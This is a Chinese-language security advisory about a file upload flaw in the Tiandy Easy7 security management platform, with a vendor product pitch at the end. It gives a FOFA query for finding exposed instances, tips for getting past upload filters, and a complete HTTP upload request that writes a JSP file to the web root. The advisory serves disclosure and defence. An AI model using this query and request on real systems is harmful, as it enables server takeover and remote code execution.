文章总结: 天地伟业Easy7综合安防管理平台的uploadMapServerBgImage接口存在高危文件上传漏洞,攻击者可绕过验证上传恶意脚本获取服务器权限,导致远程代码执行。该漏洞通常需低权限认证,CVSS评分达8.0-9.0。建议用户立即联系官方升级补丁。文档提供了FOFA语法与复现POC,并提及相关检测产品支持。
综合评分: 75
文章分类: 漏洞预警,漏洞POC,解决方案,软文广告
【漏洞预警】天地伟业Easy7 uploadMapServerBgImage 文件上传漏洞
by 融云安全-sm
by 融云安全-sm
融云攻防实验室
2026年3月5日 17:37
江西
漏洞名称:
天地伟业Easy7 uploadMapServerBgImage 文件上传漏洞
组件详情:
天地伟业Easy7 uploadMapServerBgImage 文件上传漏洞是“天地伟业Easy7综合安防管理平台”中存在的高危安全缺陷。攻击者可通过平台地图服务模块的文件上传接口(/uploadMapServerBgImage),绕过安全限制上传恶意脚本文件,进而获取服务器控制权限,导致远程代码执行(RCE),/uploadMapServerBgImage(常见完整路径为/api/v1/uploadMapServerBgImage、/api/uploadMapServerBgImage、/map/uploadMapServerBgImage等变体)。
影响范围:
- 受影响的 Easy7 平台特定版本(具体版本号通常由厂商在安全公告中明确,公开资料中常描述为“多个受影响版本”)。
- 将 Web 管理界面暴露在公网或不可信网络内的实例风险最高。
漏洞类型:
高危 – 任意文件上传,可导致 远程代码执行;根本原因是服务端验证绕过。
利用条件:
1.用户认证: 通常需要低权限用户认证(即攻击者需要先获取一个有效账户登录)。部分利用方式可能在结合其他漏洞(如越权)时可实现未授权访问。
2.前置条件: 目标系统必须启用并存在存在漏洞的“地图服务”或相关功能模块,且攻击者能够访问到该上传接口。
3.触发方式: 攻击者通过构造特殊的 HTTP POST 请求,将包含恶意代码的文件(如 .jsp、.asp、.php的WebShell)伪装成图片(如修改数据包中的 Content-Type为 image/jpeg,或使用双后缀名 shell.jpg.jsp等方式),绕过前端和后端的过滤检查,上传至服务器可访问的Web目录。
综合评价:
1.攻击途径: 网络
2.攻击复杂度: 低
3.所需权限: 通常需低权限用户(存在未授权利用可能时风险剧增)
4.用户交互: 无需
5.影响范围: 可完全接管服务器,影响机密性、完整性、可用性。
6.综合评分: 高危 (CVSS 3.x: 8.0-9.0, 具体取决于是否需要认证)
官方解决方案:
立即联系“天地伟业”官方,获取最新的安全补丁并升级到无漏洞的版本。这是最根本的解决方案。
复现情况
fofa:
body=”/Easy7/apps/WebService/LogIn.jsp” || body=”Easy7/VideoLib.EXE” || body=”/Easy7/index.html” || (body=”<img src=\”./images/ico/Easy7_logo_transparent.png”) && title=”平台”
1.上传文件到x.jsp,访问/Easy7/x.jsp得到结果
POST /Easy7/rest/file/uploadMapServerBgImage HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36Connection: closeContent-Length: 280Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAccept-Encoding: gzip
------WebKitFormBoundaryContent-Disposition: form-data; name="uploadParams"
[{"path": "/", "name": "x.jsp"}]------WebKitFormBoundaryContent-Disposition: form-data; name="file"; filename="1.png"Content-Type: image/png
1111111111111111111------WebKitFormBoundary--
2.渝融云NTM入侵检测系统已支持天地伟业Easy7 uploadMapServerBgImage 文件上传漏洞检测(入侵检测合作可私聊公众号)
渝融云解决方案-渝融云NTM全流量分析探针
已添加监测规则,可实时监控青龙面板 网站管理系统 command-run 远程代码执行漏洞
设备简介:渝融云NTM全流量分析探针是一款集流量分析、威胁检测与行为审计于一体的智能化网络流量监测平台。系统通过对网络全流量的实时采集与深度解析,帮助用户实现网络态势的“全景透视”。
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:融云攻防实验室 by 融云安全-sm
by 融云安全-sm《【漏洞预警】天地伟业Easy7 uploadMapServerBgImage 文件上传漏洞》